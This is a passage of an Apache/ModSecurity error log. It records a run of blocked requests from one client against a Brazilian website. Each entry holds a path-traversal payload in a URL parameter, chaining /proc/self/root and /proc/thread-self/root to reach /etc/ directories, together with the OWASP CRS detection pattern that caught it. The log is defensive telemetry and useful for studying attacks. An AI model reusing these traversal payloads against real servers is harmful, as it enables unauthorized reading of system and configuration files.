"abuill_V7PWP6ixUYl6GHAAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:15:39.387626 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:42464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuim-yqAr6etmhZHNotnwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:15:40.766942 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.241.31:41490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuinF_V7PWP6ixUYl6GHwAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:15:42.071230 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:41494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuingbLMZ6AikZjR9UnmwAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:15:44.919036 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:41506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuioPu8EFLIOrSqIptnxwAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:30.140351 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:41512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuizhkFeYa1D6dYQnC3kgAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:31.570732 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:44104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiz8df6f5d65gmYZQ9KAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:32.967261 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:44106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui0Na6ubjKNq_cu4YKpgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:34.275238 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:44120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui0ta6ubjKNq_cu4YKpwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:35.671228 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:44130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui0_-YZRR_7pZ7nDJXKQAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:36.984065 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:44134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui1Mdf6f5d65gmYZQ9LAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:38.323463 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:51094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui1ta6ubjKNq_cu4YKqwAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:41.035491 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:51100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui1-oXxyEfFpUF8f_a0AAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:42.519576 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:51102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui2sdf6f5d65gmYZQ9MwAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:45.047810 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:51106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui3QkwaGbbGflqUZB-XwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:46.424035 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:51118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui3ta6ubjKNq_cu4YKrwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:47.818250 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:59392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui3wkwaGbbGflqUZB-YQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:49.116060 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:59400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui4QbLMZ6AikZjR9UnvAAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:50.531939 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:59404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui4hkFeYa1D6dYQnC3oAAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:51.900838 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.241.31:59412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui4wbLMZ6AikZjR9UnvQAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:53.313133 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:59416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui5da6ubjKNq_cu4YKtAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:54.578711 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:59426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui5gbLMZ6AikZjR9UnwAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
